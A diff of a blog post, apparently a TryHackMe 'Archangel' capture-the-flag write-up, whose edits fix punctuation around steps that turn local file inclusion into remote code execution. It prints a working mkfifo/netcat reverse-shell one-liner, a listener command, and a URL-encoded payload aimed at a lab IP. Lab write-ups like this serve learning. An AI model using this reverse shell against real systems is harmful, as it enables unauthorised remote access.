jsecurity-rocks/p4r490n.github.io/_posts/2021-06-06-TryHackMe - Archangel.md

 Success!

-Due to server running Apache and executing php code & our abbility to LFI now we have working RCE.
+Due to server running Apache and executing php code & our abbility to LFI - now we have working RCE.

-To get a reverse shell we can use the following :
+To get a reverse shell we can use the following code:

 ```
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f
 ```

-After this the next in line is setting up a netcat listener:
+After this, the next in line is setting up a netcat listener:

 ```bash
 sudo nc -nlvp 80
 ```

-Now we only have to make sure to URL encode the reverse shell request in Burp with CRTL+U. It should look like this :
+Now we only have to make sure to URL encode the reverse shell request in Burp with CRTL+U. It should look like this:

 ```
 ....&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.9.83.183+80+>/tmp/f